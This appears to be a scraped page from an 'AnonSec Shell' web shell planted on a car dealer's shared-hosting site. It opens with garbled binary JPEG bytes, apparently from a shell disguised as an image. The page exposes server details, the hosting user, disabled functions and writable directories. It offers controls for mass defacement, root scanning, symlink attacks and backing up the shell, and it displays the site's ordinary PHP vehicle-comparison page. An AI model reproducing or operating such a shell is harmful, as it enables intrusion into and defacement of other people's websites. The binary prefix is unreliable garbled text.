JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 46.28.45.50  /  Your IP : 216.73.216.219   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux in-mum-web1275.main-hosting.eu 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User : u215115003 ( 215115003)
PHP Version : 8.1.34
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u215115003/domains/luxurymotorz.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/u215115003/domains/luxurymotorz.com/public_html/compare1.php
<?php
require_once ("config/config.inc.php");
include "include/header.inc.php" ?>

<script>
    let storedProducts = localStorage.getItem('comparedProducts');
    storedProducts = JSON.parse(storedProducts);
    console.log(storedProducts);
</script>

<link rel="stylesheet" href="<?= MAIN_DIR ?>assets/css/product.css">

<div class="inner-page-banner">

    <div class="banner-wrapper">

        <div class="container-fluid">

            <div class="banner-main-content-wrap">

            </div>

        </div>

    </div>

</div>

<div class="compare-page pt-100 mb-100">

    <div class="container">

        <div class="d-flex justify-content-between mb-50">

            <div class="comparea-content">

                <h1 class="text-white">Compare Your Vehicles</h1>

            </div>

        </div>

        <div class="row g-4 mb-50">


            <div class="col-lg-4">

                <div class="product-upload-area text-center">

                    <a href="<?= MAIN_DIR ?>" class="upload-area">

                        <i class="bi bi-plus"></i>

                    </a>

                    <div class="comparea-content">

                        <h6>Add to Compare</h6>

                    </div>

                </div>

            </div>

            <div class="col-lg-4">

                <div class="product-card style-2 compare">

                    <div class="close-btn">

                        <i class="bi bi-x"></i>

                    </div>

                    <div class="product-img">

                        <img src="<?= MAIN_DIR ?>static/car_varient/1717401140WhatsApp Image 2024-05-07 at 1.19.06 PM.jpeg"
                            alt="image">

                    </div>

                    <div class="product-content">

                        <div class="content-top">

                            <div class="price-and-title">

                                <h5><a href="<?= MAIN_DIR ?>car-deatils.html">Audi A4 TECHNOLOGY PACK 40 TFSI</a></h5>

                                <h5 class="price">₹43,00,000

                                </h5>

                            </div>

                            <div class="company-logo">

                                <img src="<?= MAIN_DIR ?>img/brand-icons/audi.png" alt>

                            </div>

                        </div>
                    </div>

                </div>

            </div>


        </div>

        <div class="row">

            <div class="col-lg-12">

                <div data-bs-spy="scroll" data-bs-target="#navbar-example2" data-bs-offset="0" class="scrollspy-example"
                    tabindex="0">

                    <div class="single-compare mb-50" id="car-info">

                        <div class="section-title mb-20">

                            <h5>Summary</h5>

                        </div>

                        <div class="table-wrapper">

                            <div class="table-responsive">
                                <table class="eg-table compare-table">

                                    <thead>

                                        <tr>

                                            <th>

                                                Basic Info</th>



                                            <th>Audi A4 TECHNOLOGY PACK 40 TFSI

                                            </th>


                                        </tr>

                                    </thead>

                                    <tbody>

                                        <tr>

                                            <td>

                                                Brand Name

                                            </td>

                                            <td>

                                                BMW

                                            </td>


                                        </tr>

                                        <tr>

                                            <td>

                                                Price

                                            </td>

                                            <td>

                                                ₹43,00,000

                                            </td>


                                        </tr>

                                        <tr>

                                            <td>

                                                Registered Year

                                            </td>

                                            <td>

                                                2020-04-04

                                            </td>


                                        </tr>

                                        <tr>

                                            <td>

                                                Registered State

                                            </td>

                                            <td>

                                                Karnataka

                                            </td>


                                        </tr>

                                        <tr>

                                            <td>

                                                Fuel Type

                                            </td>

                                            <td>

                                                Petrol

                                            </td>


                                        </tr>

                                        <tr>

                                            <td>

                                                Gear Type

                                            </td>

                                            <td>

                                                Auto

                                            </td>


                                        </tr>

                                        <tr>

                                            <td>

                                                No. of Owners

                                            </td>

                                            <td>

                                                2

                                            </td>


                                        </tr>

                                        <tr>

                                            <td>

                                                Color

                                            </td>

                                            <td>

                                                Blue

                                            </td>


                                        </tr>

                                        <tr>

                                            <td>

                                                KM Driven

                                            </td>

                                            <td>

                                                5000

                                            </td>


                                        </tr>

                                        <tr>

                                            <td>

                                                Insurance

                                            </td>

                                            <td>

                                                Comp

                                            </td>


                                        </tr>

                                        <tr>

                                            <td>

                                                New Product Price

                                            </td>

                                            <td>

                                                ₹42,50,000

                                            </td>


                                        </tr>

                                        <tr>

                                            <td>

                                                Highlights

                                            </td>

                                            <td>

                                                Wonderful Condition

                                            </td>


                                        </tr>

                                    </tbody>


                                </table>
                            </div>
                        </div>

                    </div>

                </div>

            </div>

        </div>

    </div>

</div>

<?php include "include/footer.inc.php"; ?>

Anon7 - 2022
AnonSec Team